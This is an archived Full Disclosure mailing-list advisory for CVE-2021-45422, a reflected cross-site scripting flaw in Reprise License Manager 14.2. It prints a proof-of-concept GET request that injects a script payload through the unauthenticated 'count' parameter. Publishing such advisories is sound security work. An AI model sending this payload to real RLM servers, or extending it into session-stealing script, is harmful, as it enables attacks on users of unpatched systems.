[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Mt9bxC3--3-2@tutanota.com>
Date: Tue, 11 Jan 2022 20:31:35 +0100 (CET)
From: Gionathan Reale via Fulldisclosure <fulldisclosure@...lists.org>
To: Fulldisclosure <fulldisclosure@...lists.org>
Subject: [FD] Reprise License Manager 14.2 - Reflected Cross-Site Scripting
# Product: RLM 14.2
# Vendor: Reprise Software
# CVE ID: CVE-2021-45422
# Vulnerability Title: Reflected Cross-Site Scripting
# Severity: Medium
# Author(s): Giulia Melotti Garibaldi
# Date: 2022-01-11
#
#############################################################
Introduction:
An issue was discovered in Reprise License Manager 14.2, Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/activate_process "count" parameter via GET. No authentication is required.
Vulnerability PoC:
GET http://HOST:5054/goform/activate_process?isv=&akey=&hostid=&count=%3Cscript%3Ealert(%221%22)%3C/script%3E HTTP/1.1
Host: HOST:5054
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists